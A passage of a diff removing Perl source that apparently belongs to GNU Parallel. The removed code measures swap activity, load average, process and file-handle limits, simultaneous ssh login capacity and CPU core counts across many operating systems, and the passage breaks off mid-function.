-    if(-r $self->{'swap_activity_file'}) {
-        open(my $swap_fh, "<", $self->{'swap_activity_file'}) || ::die_bug("swap_activity_file-r");
-        my $swap_out = <$swap_fh>;
-        close $swap_fh;
-        if($swap_out =~ /^(\d+)$/) {
-            $self->{'swap_activity'} = $1;
-            ::debug("swap", "New swap_activity: ", $self->{'swap_activity'});
-        }
-        ::debug("swap", "Last update: ", $self->{'last_swap_activity_update'});
-        if(time - $self->{'last_swap_activity_update'} > 10) {
-            # last swap activity update was started 10 seconds ago
-            ::debug("swap", "Older than 10 sec: ", $self->{'swap_activity_file'});
-            $update_swap_activity_file = 1;
-        }
-    } else {
-        ::debug("swap", "No swap_activity file: ", $self->{'swap_activity_file'});
-        $self->{'swap_activity'} = undef;
-        $update_swap_activity_file = 1;
-    }
-    if($update_swap_activity_file) {
-        ::debug("swap", "Updating swap_activity file ", $self->{'swap_activity_file'});
-        $self->{'last_swap_activity_update'} = time;
-        -e $ENV{'HOME'}."/.parallel" or mkdir $ENV{'HOME'}."/.parallel";
-        -e $ENV{'HOME'}."/.parallel/tmp" or mkdir $ENV{'HOME'}."/.parallel/tmp";
-        my $swap_activity;
-	$swap_activity = swapactivityscript();
-        if($self->{'string'} ne ":") {
-            $swap_activity = $self->sshcommand() . " " . $self->serverlogin() . " " .
-		::shell_quote_scalar($swap_activity);
-        }
-        # Run swap_activity measuring.
-        # As the command can take long to run if run remote
-        # save it to a tmp file before moving it to the correct file
-        my $file = $self->{'swap_activity_file'};
-        my ($dummy_fh, $tmpfile) = ::tmpfile(SUFFIX => ".swp");
-	::debug("swap", "\n", $swap_activity, "\n");
-        qx{ ($swap_activity > $tmpfile && mv $tmpfile $file || rm $tmpfile) & };
-    }
-    return $self->{'swap_activity'};
-}
-
-{
-    my $script;
-
-    sub swapactivityscript {
-	# Returns:
-	#   shellscript for detecting swap activity
-	#
-	# arguments for vmstat are OS dependant
-	# swap_in and swap_out are in different columns depending on OS
-	#
-	if(not $script) {
-	    my %vmstat = (
-		# linux: $7*$8
-		# $ vmstat 1 2
-		# procs -----------memory---------- ---swap-- -----io---- -system-- ----cpu----
-		#  r  b   swpd   free   buff  cache   si   so    bi    bo   in   cs us sy id wa
-		#  5  0  51208 1701096 198012 18857888    0    0    37   153   28   19 56 11 33  1
-		#  3  0  51208 1701288 198012 18857972    0    0     0     0 3638 10412 15  3 82  0
-		'linux' => ['vmstat 1 2 | tail -n1', '$7*$8'],
-
-		# solaris: $6*$7
-		# $ vmstat -S 1 2
-		#  kthr      memory            page            disk          faults      cpu
-		#  r b w   swap  free  si  so pi po fr de sr s3 s4 -- --   in   sy   cs us sy id
-		#  0 0 0 4628952 3208408 0  0  3  1  1  0  0 -0  2  0  0  263  613  246  1  2 97
-		#  0 0 0 4552504 3166360 0  0  0  0  0  0  0  0  0  0  0  246  213  240  1  1 98
-		'solaris' => ['vmstat -S 1 2 | tail -1', '$6*$7'],
-
-		# darwin (macosx): $21*$22
-		# $ vm_stat -c 2 1
-		# Mach Virtual Memory Statistics: (page size of 4096 bytes)
-		#     free   active   specul inactive throttle    wired  prgable   faults     copy    0fill reactive   purged file-backed anonymous cmprssed cmprssor  dcomprs   comprs  pageins  pageout  swapins swapouts
-		#   346306   829050    74871   606027        0   240231    90367  544858K 62343596  270837K    14178   415070      570102    939846      356      370      116      922  4019813        4        0        0
-		#   345740   830383    74875   606031        0   239234    90369     2696      359      553        0        0      570110    941179      356      370        0        0        0        0        0        0
-		'darwin' => ['vm_stat -c 2 1 | tail -n1', '$21*$22'],
-
-		# ultrix: $12*$13
-		# $ vmstat -S 1 2
-		#  procs      faults    cpu      memory              page             disk
-		#  r b w   in  sy  cs us sy id  avm  fre  si so  pi  po  fr  de  sr s0
-		#  1 0 0    4  23   2  3  0 97 7743 217k   0  0   0   0   0   0   0  0
-		#  1 0 0    6  40   8  0  1 99 7743 217k   0  0   3   0   0   0   0  0
-		'ultrix' => ['vmstat -S 1 2 | tail -1', '$12*$13'],
-
-		# aix: $6*$7
-		# $ vmstat 1 2
-		# System configuration: lcpu=1 mem=2048MB
-		#
-		# kthr    memory              page              faults        cpu
-		# ----- ----------- ------------------------ ------------ -----------
-		#  r  b   avm   fre  re  pi  po  fr   sr  cy  in   sy  cs us sy id wa
-		#  0  0 333933 241803   0   0   0   0    0   0  10  143  90  0  0 99  0
-		#  0  0 334125 241569   0   0   0   0    0   0  37 5368 184  0  9 86  5
-		'aix' => ['vmstat 1 2 | tail -n1', '$6*$7'],
-
-		# freebsd: $8*$9
-		# $ vmstat -H 1 2
-		#  procs      memory      page                    disks     faults         cpu
-		#  r b w     avm    fre   flt  re  pi  po    fr  sr ad0 ad1   in   sy   cs us sy id
-		#  1 0 0  596716   19560    32   0   0   0    33   8   0   0   11  220  277  0  0 99
-		#  0 0 0  596716   19560     2   0   0   0     0   0   0   0   11  144  263  0  1 99
-		'freebsd' => ['vmstat -H 1 2 | tail -n1', '$8*$9'],
-
-		# mirbsd: $8*$9
-		# $ vmstat 1 2
-		#  procs   memory        page                    disks     traps         cpu
-		#  r b w    avm    fre   flt  re  pi  po  fr  sr wd0 cd0  int   sys   cs us sy id
-		#  0 0 0  25776 164968    34   0   0   0   0   0   0   0  230   259   38  4  0 96
-		#  0 0 0  25776 164968    24   0   0   0   0   0   0   0  237   275   37  0  0 100
-		'mirbsd' => ['vmstat 1 2 | tail -n1', '$8*$9'],
-
-		# netbsd: $7*$8
-		# $ vmstat 1 2
-		#  procs    memory      page                       disks   faults      cpu
-		#  r b      avm    fre  flt  re  pi   po   fr   sr w0 w1   in   sy  cs us sy id
-		#  0 0   138452   6012   54   0   0    0    1    2  3  0    4  100  23  0  0 100
-		#  0 0   138456   6008    1   0   0    0    0    0  0  0    7   26  19  0 0 100
-		'netbsd' => ['vmstat 1 2 | tail -n1', '$7*$8'],
-
-		# openbsd: $8*$9
-		# $ vmstat 1 2
-		#  procs    memory       page                    disks    traps          cpu
-		#  r b w    avm     fre  flt  re  pi  po  fr  sr wd0 wd1  int   sys   cs us sy id
-		#  0 0 0  76596  109944   73   0   0   0   0   0   0   1    5   259   22  0  1 99
-		#  0 0 0  76604  109936   24   0   0   0   0   0   0   0    7   114   20  0  1 99
-		'openbsd' => ['vmstat 1 2 | tail -n1', '$8*$9'],
-
-		# hpux: $8*$9
-		# $ vmstat 1 2
-		#          procs           memory                   page                              faults       cpu
-		#     r     b     w      avm    free   re   at    pi   po    fr   de    sr     in     sy    cs  us sy id
-		#     1     0     0   247211  216476    4    1     0    0     0    0     0    102  73005    54   6 11 83
-		#     1     0     0   247211  216421   43    9     0    0     0    0     0    144   1675    96  25269512791222387000 25269512791222387000 105
-		'hpux' => ['vmstat 1 2 | tail -n1', '$8*$9'],
-
-		# dec_osf (tru64): $11*$12
-		# $ vmstat  1 2
-		# Virtual Memory Statistics: (pagesize = 8192)
-		#   procs      memory        pages                            intr       cpu
-		#   r   w   u  act free wire fault  cow zero react  pin pout  in  sy  cs us sy id
-		#   3 181  36  51K 1895 8696  348M  59M 122M   259  79M    0   5 218 302  4  1 94
-		#   3 181  36  51K 1893 8696     3   15   21     0   28    0   4  81 321  1  1 98
-		'dec_osf' => ['vmstat 1 2 | tail -n1', '$11*$12'],
-
-		# gnu (hurd): $7*$8
-		# $ vmstat -k 1 2
-		# (pagesize: 4, size: 512288, swap size: 894972)
-		#   free   actv  inact  wired   zeroed  react    pgins   pgouts  pfaults  cowpfs hrat    caobj  cache swfree
-		# 371940  30844  89228  20276   298348      0    48192    19016   756105   99808  98%      876  20628 894972
-		# 371940  30844  89228  20276       +0     +0       +0       +0      +42      +2  98%      876  20628 894972
-		'gnu' => ['vmstat -k 1 2 | tail -n1', '$7*$8'],
-
-		# -nto (qnx has no swap)
-		#-irix
-		#-svr5 (scosysv)
-		);
-	    my $perlscript = "";
-	    for my $os (keys %vmstat) {
-		#q[ { vmstat 1 2 2> /dev/null || vmstat -c 1 2; } | ].
-		#   q[ awk 'NR!=4{next} NF==17||NF==16{print $7*$8} NF==22{print $21*$22} {exit}' ];
-		$vmstat{$os}[1] =~ s/\$/\\\\\\\$/g; # $ => \\\$
-		$perlscript .= 'if($^O eq "'.$os.'") { print `'.$vmstat{$os}[0].' | awk "{print ' .
-		    $vmstat{$os}[1] . '}"` }';
-	    }
-	    $perlscript = "perl -e " . ::shell_quote_scalar($perlscript);
-	    $script = $Global::envvar. " " .$perlscript;
-	}
-	return $script;
-    }
-}
-
-sub too_fast_remote_login {
-    my $self = shift;
-    if($self->{'last_login_at'} and $self->{'time_to_login'}) {
-	# sshd normally allows 10 simultaneous logins
-	# A login takes time_to_login
-	# So time_to_login/5 should be safe
-	# If now <= last_login + time_to_login/5: Then it is too soon.
-	my $too_fast = (::now() <= $self->{'last_login_at'}
-			+ $self->{'time_to_login'}/5);
-	::debug("run", "Too fast? $too_fast ");
-	return $too_fast;
-    } else {
-	# No logins so far (or time_to_login not computed): it is not too fast
-	return 0;
-    }
-}
-
-sub last_login_at {
-    my $self = shift;
-    return $self->{'last_login_at'};
-}
-
-sub set_last_login_at {
-    my $self = shift;
-    $self->{'last_login_at'} = shift;
-}
-
-sub loadavg_too_high {
-    my $self = shift;
-    my $loadavg = $self->loadavg();
-    return (not defined $loadavg or
-            $loadavg > $self->max_loadavg());
-}
-
-sub loadavg {
-    # If the currently know loadavg is too old:
-    #   Recompute a new one in the background
-    # The load average is computed as the number of processes waiting for disk
-    # or CPU right now. So it is the server load this instant and not averaged over
-    # several minutes. This is needed so GNU Parallel will at most start one job
-    # that will push the load over the limit.
-    #
-    # Returns:
-    #   $last_loadavg = last load average computed (undef if none)
-    my $self = shift;
-    # Should we update the loadavg file?
-    my $update_loadavg_file = 0;
-    if(open(my $load_fh, "<", $self->{'loadavg_file'})) {
-	local $/ = undef;
-        my $load_out = <$load_fh>;
-        close $load_fh;
-	my $load =()= ($load_out=~/(^[DR]....[^\[])/gm);
-        if($load > 0) {
-	    # load is overestimated by 1
-            $self->{'loadavg'} = $load - 1;
-            ::debug("load", "New loadavg: ", $self->{'loadavg'});
-        } else {
-	    ::die_bug("loadavg_invalid_content: $load_out");
-	}
-        ::debug("load", "Last update: ", $self->{'last_loadavg_update'});
-        if(time - $self->{'last_loadavg_update'} > 10) {
-            # last loadavg was started 10 seconds ago
-            ::debug("load", time - $self->{'last_loadavg_update'}, " secs old: ",
-		    $self->{'loadavg_file'});
-            $update_loadavg_file = 1;
-        }
-    } else {
-        ::debug("load", "No loadavg file: ", $self->{'loadavg_file'});
-        $self->{'loadavg'} = undef;
-        $update_loadavg_file = 1;
-    }
-    if($update_loadavg_file) {
-        ::debug("load", "Updating loadavg file", $self->{'loadavg_file'}, "\n");
-        $self->{'last_loadavg_update'} = time;
-        -e $ENV{'HOME'}."/.parallel" or mkdir $ENV{'HOME'}."/.parallel";
-        -e $ENV{'HOME'}."/.parallel/tmp" or mkdir $ENV{'HOME'}."/.parallel/tmp";
-        my $cmd = "";
-        if($self->{'string'} ne ":") {
-	    $cmd = $self->sshcommand() . " " . $self->serverlogin() . " ";
-	}
-	# TODO Is is called 'ps ax -o state,command' on other platforms?
-	$cmd .= "ps ax -o state,command";
-        # As the command can take long to run if run remote
-        # save it to a tmp file before moving it to the correct file
-        my $file = $self->{'loadavg_file'};
-        my ($dummy_fh, $tmpfile) = ::tmpfile(SUFFIX => ".loa");
-        qx{ ($cmd > $tmpfile && mv $tmpfile $file || rm $tmpfile) & };
-    }
-    return $self->{'loadavg'};
-}
-
-sub max_loadavg {
-    my $self = shift;
-    # If --load is a file it might be changed
-    if($Global::max_load_file) {
-	my $mtime = (stat($Global::max_load_file))[9];
-	if($mtime > $Global::max_load_file_last_mod) {
-	    $Global::max_load_file_last_mod = $mtime;
-	    for my $sshlogin (values %Global::host) {
-		$sshlogin->set_max_loadavg(undef);
-	    }
-	}
-    }
-    if(not defined $self->{'max_loadavg'}) {
-        $self->{'max_loadavg'} =
-            $self->compute_max_loadavg($opt::load);
-    }
-    ::debug("load", "max_loadavg: ", $self->string(), " ", $self->{'max_loadavg'});
-    return $self->{'max_loadavg'};
-}
-
-sub set_max_loadavg {
-    my $self = shift;
-    $self->{'max_loadavg'} = shift;
-}
-
-sub compute_max_loadavg {
-    # Parse the max loadaverage that the user asked for using --load
-    # Returns:
-    #   max loadaverage
-    my $self = shift;
-    my $loadspec = shift;
-    my $load;
-    if(defined $loadspec) {
-        if($loadspec =~ /^\+(\d+)$/) {
-            # E.g. --load +2
-            my $j = $1;
-            $load =
-                $self->ncpus() + $j;
-        } elsif ($loadspec =~ /^-(\d+)$/) {
-            # E.g. --load -2
-            my $j = $1;
-            $load =
-                $self->ncpus() - $j;
-        } elsif ($loadspec =~ /^(\d+)\%$/) {
-            my $j = $1;
-            $load =
-                $self->ncpus() * $j / 100;
-        } elsif ($loadspec =~ /^(\d+(\.\d+)?)$/) {
-            $load = $1;
-        } elsif (-f $loadspec) {
-            $Global::max_load_file = $loadspec;
-            $Global::max_load_file_last_mod = (stat($Global::max_load_file))[9];
-            if(open(my $in_fh, "<", $Global::max_load_file)) {
-                my $opt_load_file = join("",<$in_fh>);
-                close $in_fh;
-                $load = $self->compute_max_loadavg($opt_load_file);
-            } else {
-                print $Global::original_stderr "Cannot open $loadspec\n";
-                ::wait_and_exit(255);
-            }
-        } else {
-            print $Global::original_stderr "Parsing of --load failed\n";
-            ::die_usage();
-        }
-        if($load < 0.01) {
-            $load = 0.01;
-        }
-    }
-    return $load;
-}
-
-sub time_to_login {
-    my $self = shift;
-    return $self->{'time_to_login'};
-}
-
-sub set_time_to_login {
-    my $self = shift;
-    $self->{'time_to_login'} = shift;
-}
-
-sub max_jobs_running {
-    my $self = shift;
-    if(not defined $self->{'max_jobs_running'}) {
-        my $nproc = $self->compute_number_of_processes($opt::jobs);
-        $self->set_max_jobs_running($nproc);
-    }
-    return $self->{'max_jobs_running'};
-}
-
-sub orig_max_jobs_running {
-    my $self = shift;
-    return $self->{'orig_max_jobs_running'};
-}
-
-sub compute_number_of_processes {
-    # Number of processes wanted and limited by system resources
-    # Returns:
-    #   Number of processes
-    my $self = shift;
-    my $opt_P = shift;
-    my $wanted_processes = $self->user_requested_processes($opt_P);
-    if(not defined $wanted_processes) {
-        $wanted_processes = $Global::default_simultaneous_sshlogins;
-    }
-    ::debug("load", "Wanted procs: $wanted_processes\n");
-    my $system_limit =
-        $self->processes_available_by_system_limit($wanted_processes);
-    ::debug("load", "Limited to procs: $system_limit\n");
-    return $system_limit;
-}
-
-sub processes_available_by_system_limit {
-    # If the wanted number of processes is bigger than the system limits:
-    # Limit them to the system limits
-    # Limits are: File handles, number of input lines, processes,
-    # and taking > 1 second to spawn 10 extra processes
-    # Returns:
-    #   Number of processes
-    my $self = shift;
-    my $wanted_processes = shift;
-
-    my $system_limit = 0;
-    my @jobs = ();
-    my $job;
-    my @args = ();
-    my $arg;
-    my $more_filehandles = 1;
-    my $max_system_proc_reached = 0;
-    my $slow_spawining_warning_printed = 0;
-    my $time = time;
-    my %fh;
-    my @children;
-
-    # Reserve filehandles
-    # perl uses 7 filehandles for something?
-    # parallel uses 1 for memory_usage
-    # parallel uses 4 for ?
-    for my $i (1..12) {
-        open($fh{"init-$i"}, "<", "/dev/null");
-    }
-
-    for(1..2) {
-        # System process limit
-        my $child;
-        if($child = fork()) {
-            push (@children,$child);
-            $Global::unkilled_children{$child} = 1;
-        } elsif(defined $child) {
-            # The child takes one process slot
-            # It will be killed later
-            $SIG{TERM} = $Global::original_sig{TERM};
-            sleep 10000000;
-            exit(0);
-        } else {
-            $max_system_proc_reached = 1;
-        }
-    }
-    my $count_jobs_already_read = $Global::JobQueue->next_seq();
-    my $wait_time_for_getting_args = 0;
-    my $start_time = time;
-    while(1) {
-        $system_limit >= $wanted_processes and last;
-        not $more_filehandles and last;
-        $max_system_proc_reached and last;
-	my $before_getting_arg = time;
-        if($Global::semaphore or $opt::pipe) {
-	    # Skip: No need to get args
-        } elsif(defined $opt::retries and $count_jobs_already_read) {
-            # For retries we may need to run all jobs on this sshlogin
-            # so include the already read jobs for this sshlogin
-            $count_jobs_already_read--;
-        } else {
-            if($opt::X or $opt::m) {
-                # The arguments may have to be re-spread over several jobslots
-                # So pessimistically only read one arg per jobslot
-                # instead of a full commandline
-                if($Global::JobQueue->{'commandlinequeue'}->{'arg_queue'}->empty()) {
-		    if($Global::JobQueue->empty()) {
-			last;
-		    } else {
-			($job) = $Global::JobQueue->get();
-			push(@jobs, $job);
-		    }
-		} else {
-		    ($arg) = $Global::JobQueue->{'commandlinequeue'}->{'arg_queue'}->get();
-		    push(@args, $arg);
-		}
-            } else {
-                # If there are no more command lines, then we have a process
-                # per command line, so no need to go further
-                $Global::JobQueue->empty() and last;
-                ($job) = $Global::JobQueue->get();
-                push(@jobs, $job);
-	    }
-        }
-	$wait_time_for_getting_args += time - $before_getting_arg;
-        $system_limit++;
-
-        # Every simultaneous process uses 2 filehandles when grouping
-        # Every simultaneous process uses 2 filehandles when compressing
-        $more_filehandles = open($fh{$system_limit*10}, "<", "/dev/null")
-            && open($fh{$system_limit*10+2}, "<", "/dev/null")
-            && open($fh{$system_limit*10+3}, "<", "/dev/null")
-            && open($fh{$system_limit*10+4}, "<", "/dev/null");
-
-        # System process limit
-        my $child;
-        if($child = fork()) {
-            push (@children,$child);
-            $Global::unkilled_children{$child} = 1;
-        } elsif(defined $child) {
-            # The child takes one process slot
-            # It will be killed later
-            $SIG{TERM} = $Global::original_sig{TERM};
-            sleep 10000000;
-            exit(0);
-        } else {
-            $max_system_proc_reached = 1;
-        }
-	my $forktime = time - $time - $wait_time_for_getting_args;
-        ::debug("run", "Time to fork $system_limit procs: $wait_time_for_getting_args ",
-		$forktime,
-		" (processes so far: ", $system_limit,")\n");
-        if($system_limit > 10 and
-	   $forktime > 1 and
-	   $forktime > $system_limit * 0.01
-	   and not $slow_spawining_warning_printed) {
-            # It took more than 0.01 second to fork a processes on avg.
-            # Give the user a warning. He can press Ctrl-C if this
-            # sucks.
-            print $Global::original_stderr
-                ("parallel: Warning: Starting $system_limit processes took > $forktime sec.\n",
-                 "Consider adjusting -j. Press CTRL-C to stop.\n");
-            $slow_spawining_warning_printed = 1;
-        }
-    }
-    # Cleanup: Close the files
-    for (values %fh) { close $_ }
-    # Cleanup: Kill the children
-    for my $pid (@children) {
-        kill 9, $pid;
-        waitpid($pid,0);
-        delete $Global::unkilled_children{$pid};
-    }
-    # Cleanup: Unget the command_lines or the @args
-    $Global::JobQueue->{'commandlinequeue'}->{'arg_queue'}->unget(@args);
-    $Global::JobQueue->unget(@jobs);
-    if($system_limit < $wanted_processes) {
-	# The system_limit is less than the wanted_processes
-	if($system_limit < 1 and not $Global::JobQueue->empty()) {
-	    ::warning("Cannot spawn any jobs. Raising ulimit -u or /etc/security/limits.conf\n",
-		      "or /proc/sys/kernel/pid_max may help.\n");
-	    ::wait_and_exit(255);
-	}
-	if(not $more_filehandles) {
-	    ::warning("Only enough file handles to run ", $system_limit, " jobs in parallel.\n",
-		      "Running 'parallel -j0 -N", $system_limit, " --pipe parallel -j0' or ",
-		      "raising ulimit -n or /etc/security/limits.conf may help.\n");
-	}
-	if($max_system_proc_reached) {
-	    ::warning("Only enough available processes to run ", $system_limit,
-		      " jobs in parallel. Raising ulimit -u or /etc/security/limits.conf\n",
-		      "or /proc/sys/kernel/pid_max may help.\n");
-	}
-    }
-    if($] == 5.008008 and $system_limit > 1000) {
-	# https://savannah.gnu.org/bugs/?36942
-	$system_limit = 1000;
-    }
-    if($Global::JobQueue->empty()) {
-	$system_limit ||= 1;
-    }
-    if($self->string() ne ":" and
-       $system_limit > $Global::default_simultaneous_sshlogins) {
-        $system_limit =
-            $self->simultaneous_sshlogin_limit($system_limit);
-    }
-    return $system_limit;
-}
-
-sub simultaneous_sshlogin_limit {
-    # Test by logging in wanted number of times simultaneously
-    # Returns:
-    #   min($wanted_processes,$working_simultaneous_ssh_logins-1)
-    my $self = shift;
-    my $wanted_processes = shift;
-    if($self->{'time_to_login'}) {
-	return $wanted_processes;
-    }
-
-    # Try twice because it guesses wrong sometimes
-    # Choose the minimal
-    my $ssh_limit =
-        ::min($self->simultaneous_sshlogin($wanted_processes),
-	      $self->simultaneous_sshlogin($wanted_processes));
-    if($ssh_limit < $wanted_processes) {
-        my $serverlogin = $self->serverlogin();
-        ::warning("ssh to $serverlogin only allows ",
-		  "for $ssh_limit simultaneous logins.\n",
-		  "You may raise this by changing ",
-		  "/etc/ssh/sshd_config:MaxStartups and MaxSessions on $serverlogin.\n",
-		  "Using only ",$ssh_limit-1," connections ",
-		  "to avoid race conditions.\n");
-    }
-    # Race condition can cause problem if using all sshs.
-    if($ssh_limit > 1) { $ssh_limit -= 1; }
-    return $ssh_limit;
-}
-
-sub simultaneous_sshlogin {
-    # Using $sshlogin try to see if we can do $wanted_processes
-    # simultaneous logins
-    # (ssh host echo simultaneouslogin & ssh host echo simultaneouslogin & ...)|grep simul|wc -l
-    # Returns:
-    #   Number of succesful logins
-    my $self = shift;
-    my $wanted_processes = shift;
-    my $sshcmd = $self->sshcommand();
-    my $serverlogin = $self->serverlogin();
-    my $sshdelay = $opt::sshdelay ? "sleep $opt::sshdelay;" : "";
-    my $cmd = "$sshdelay$sshcmd $serverlogin echo simultaneouslogin </dev/null 2>&1 &"x$wanted_processes;
-    ::debug("init", "Trying $wanted_processes logins at $serverlogin\n");
-    open (my $simul_fh, "-|", "($cmd)|grep simultaneouslogin | wc -l") or
-	::die_bug("simultaneouslogin");
-    my $ssh_limit = <$simul_fh>;
-    close $simul_fh;
-    chomp $ssh_limit;
-    return $ssh_limit;
-}
-
-sub set_ncpus {
-    my $self = shift;
-    $self->{'ncpus'} = shift;
-}
-
-sub user_requested_processes {
-    # Parse the number of processes that the user asked for using -j
-    # Returns:
-    #   the number of processes to run on this sshlogin
-    my $self = shift;
-    my $opt_P = shift;
-    my $processes;
-    if(defined $opt_P) {
-        if($opt_P =~ /^\+(\d+)$/) {
-            # E.g. -P +2
-            my $j = $1;
-            $processes =
-                $self->ncpus() + $j;
-        } elsif ($opt_P =~ /^-(\d+)$/) {
-            # E.g. -P -2
-            my $j = $1;
-            $processes =
-                $self->ncpus() - $j;
-        } elsif ($opt_P =~ /^(\d+(\.\d+)?)\%$/) {
-            # E.g. -P 10.5%
-            my $j = $1;
-            $processes =
-                $self->ncpus() * $j / 100;
-        } elsif ($opt_P =~ /^(\d+)$/) {
-            $processes = $1;
-            if($processes == 0) {
-                # -P 0 = infinity (or at least close)
-                $processes = $Global::infinity;
-            }
-        } elsif (-f $opt_P) {
-            $Global::max_procs_file = $opt_P;
-            $Global::max_procs_file_last_mod = (stat($Global::max_procs_file))[9];
-            if(open(my $in_fh, "<", $Global::max_procs_file)) {
-                my $opt_P_file = join("",<$in_fh>);
-                close $in_fh;
-                $processes = $self->user_requested_processes($opt_P_file);
-            } else {
-                ::error("Cannot open $opt_P.\n");
-                ::wait_and_exit(255);
-            }
-        } else {
-            ::error("Parsing of --jobs/-j/--max-procs/-P failed.\n");
-            ::die_usage();
-        }
-	$processes = ::ceil($processes);
-    }
-    return $processes;
-}
-
-sub ncpus {
-    my $self = shift;
-    if(not defined $self->{'ncpus'}) {
-        my $sshcmd = $self->sshcommand();
-        my $serverlogin = $self->serverlogin();
-        if($serverlogin eq ":") {
-            if($opt::use_cpus_instead_of_cores) {
-                $self->{'ncpus'} = no_of_cpus();
-            } else {
-                $self->{'ncpus'} = no_of_cores();
-            }
-        } else {
-            my $ncpu;
-	    my $sqe = ::shell_quote_scalar($Global::envvar);
-            if($opt::use_cpus_instead_of_cores) {
-                $ncpu = qx(echo|$sshcmd $serverlogin $sqe parallel --number-of-cpus);
-            } else {
-		::debug("init",qq(echo|$sshcmd $serverlogin $sqe parallel --number-of-cores\n));
-                $ncpu = qx(echo|$sshcmd $serverlogin $sqe parallel --number-of-cores);
-            }
-	    chomp $ncpu;
-            if($ncpu =~ /^\s*[0-9]+\s*$/s) {
-                $self->{'ncpus'} = $ncpu;
-            } else {
-                ::warning("Could not figure out ",
-			  "number of cpus on $serverlogin ($ncpu). Using 1.\n");
-                $self->{'ncpus'} = 1;
-            }
-        }
-    }
-    return $self->{'ncpus'};
-}
-
-sub no_of_cpus {
-    # Returns:
-    #   Number of physical CPUs
-    local $/="\n"; # If delimiter is set, then $/ will be wrong
-    my $no_of_cpus;
-    if ($^O eq 'linux') {
-        $no_of_cpus = no_of_cpus_gnu_linux() || no_of_cores_gnu_linux();
-    } elsif ($^O eq 'freebsd') {
-        $no_of_cpus = no_of_cpus_freebsd();
-    } elsif ($^O eq 'netbsd') {
-        $no_of_cpus = no_of_cpus_netbsd();
-    } elsif ($^O eq 'openbsd') {
-        $no_of_cpus = no_of_cpus_openbsd();
-    } elsif ($^O eq 'gnu') {
-        $no_of_cpus = no_of_cpus_hurd();
-    } elsif ($^O eq 'darwin') {
-	$no_of_cpus = no_of_cpus_darwin();
-    } elsif ($^O eq 'solaris') {
-        $no_of_cpus = no_of_cpus_solaris();
-    } elsif ($^O eq 'aix') {
-        $no_of_cpus = no_of_cpus_aix();
-    } elsif ($^O eq 'hpux') {
-        $no_of_cpus = no_of_cpus_hpux();
-    } elsif ($^O eq 'nto') {
-        $no_of_cpus = no_of_cpus_qnx();
-    } elsif ($^O eq 'svr5') {
-        $no_of_cpus = no_of_cpus_openserver();
-    } elsif ($^O eq 'irix') {
-        $no_of_cpus = no_of_cpus_irix();
-    } elsif ($^O eq 'dec_osf') {
-        $no_of_cpus = no_of_cpus_tru64();
-    } else {
-	$no_of_cpus = (no_of_cpus_gnu_linux()
-		       || no_of_cpus_freebsd()
-		       || no_of_cpus_netbsd()
-		       || no_of_cpus_openbsd()
-		       || no_of_cpus_hurd()
-		       || no_of_cpus_darwin()
-		       || no_of_cpus_solaris()
-		       || no_of_cpus_aix()
-		       || no_of_cpus_hpux()
-		       || no_of_cpus_qnx()
-		       || no_of_cpus_openserver()
-		       || no_of_cpus_irix()
-		       || no_of_cpus_tru64()
-			# Number of cores is better than no guess for #CPUs
-		       || nproc()
-	    );
-    }
-    if($no_of_cpus) {
-	chomp $no_of_cpus;
-        return $no_of_cpus;
-    } else {
-        ::warning("Cannot figure out number of cpus. Using 1.\n");
-        return 1;
-    }
-}
-
-sub no_of_cores {
-    # Returns:
-    #   Number of CPU cores
-    local $/="\n"; # If delimiter is set, then $/ will be wrong
-    my $no_of_cores;
-    if ($^O eq 'linux') {
-	$no_of_cores = no_of_cores_gnu_linux();
-    } elsif ($^O eq 'freebsd') {
-        $no_of_cores = no_of_cores_freebsd();
-    } elsif ($^O eq 'netbsd') {
-        $no_of_cores = no_of_cores_netbsd();
-    } elsif ($^O eq 'openbsd') {
-        $no_of_cores = no_of_cores_openbsd();
-    } elsif ($^O eq 'gnu') {
-        $no_of_cores = no_of_cores_hurd();
-    } elsif ($^O eq 'darwin') {
-	$no_of_cores = no_of_cores_darwin();
-    } elsif ($^O eq 'solaris') {
-	$no_of_cores = no_of_cores_solaris();
-    } elsif ($^O eq 'aix') {
-        $no_of_cores = no_of_cores_aix();
-    } elsif ($^O eq 'hpux') {
-        $no_of_cores = no_of_cores_hpux();
-    } elsif ($^O eq 'nto') {
-        $no_of_cores = no_of_cores_qnx();
-    } elsif ($^O eq 'svr5') {
-        $no_of_cores = no_of_cores_openserver();
-    } elsif ($^O eq 'irix') {
-        $no_of_cores = no_of_cores_irix();
-    } elsif ($^O eq 'dec_osf') {
-        $no_of_cores = no_of_cores_tru64();
-    } else {
-	$no_of_cores = (no_of_cores_gnu_linux()
-			|| no_of_cores_freebsd()
-			|| no_of_cores_netbsd()
-			|| no_of_cores_openbsd()
-			|| no_of_cores_hurd()
-			|| no_of_cores_darwin()
-			|| no_of_cores_solaris()
-			|| no_of_cores_aix()
-			|| no_of_cores_hpux()
-			|| no_of_cores_qnx()
-			|| no_of_cores_openserver()
-			|| no_of_cores_irix()
-			|| no_of_cores_tru64()
-			|| nproc()
-	    );
-    }
-    if($no_of_cores) {
-	chomp $no_of_cores;
-        return $no_of_cores;
-    } else {
-        ::warning("Cannot figure out number of CPU cores. Using 1.\n");
-        return 1;
-    }
-}
-
-sub nproc {
-    # Returns:
-    #   Number of cores using `nproc`
-    my $no_of_cores = `nproc 2>/dev/null`;
-    return $no_of_cores;
-}
-
-sub no_of_cpus_gnu_linux {
-    # Returns:
-    #   Number of physical CPUs on GNU/Linux
-    #   undef if not GNU/Linux
-    my $no_of_cpus;
-    my $no_of_cores;
-    if(-e "/proc/cpuinfo") {
-        $no_of_cpus = 0;
-        $no_of_cores = 0;
-        my %seen;
-        open(my $in_fh, "<", "/proc/cpuinfo") || return undef;
-        while(<$in_fh>) {
-            if(/^physical id.*[:](.*)/ and not $seen{$1}++) {
-                $no_of_cpus++;
-            }
-            /^processor.*[:]/i and $no_of_cores++;
-        }
-        close $in_fh;
-    }
-    return ($no_of_cpus||$no_of_cores);
-}
-
-sub no_of_cores_gnu_linux {
-    # Returns:
-    #   Number of CPU cores on GNU/Linux
-    #   undef if not GNU/Linux
-    my $no_of_cores;
-    if(-e "/proc/cpuinfo") {
-        $no_of_cores = 0;
-        open(my $in_fh, "<", "/proc/cpuinfo") || return undef;
-        while(<$in_fh>) {
-            /^processor.*[:]/i and $no_of_cores++;
-        }
-        close $in_fh;
-    }
-    return $no_of_cores;
-}
-
-sub no_of_cpus_freebsd {
-    # Returns:
-    #   Number of physical CPUs on FreeBSD
-    #   undef if not FreeBSD
-    my $no_of_cpus =
-	(`sysctl -a dev.cpu 2>/dev/null | grep \%parent | awk '{ print \$2 }' | uniq | wc -l | awk '{ print \$1 }'`
-	 or
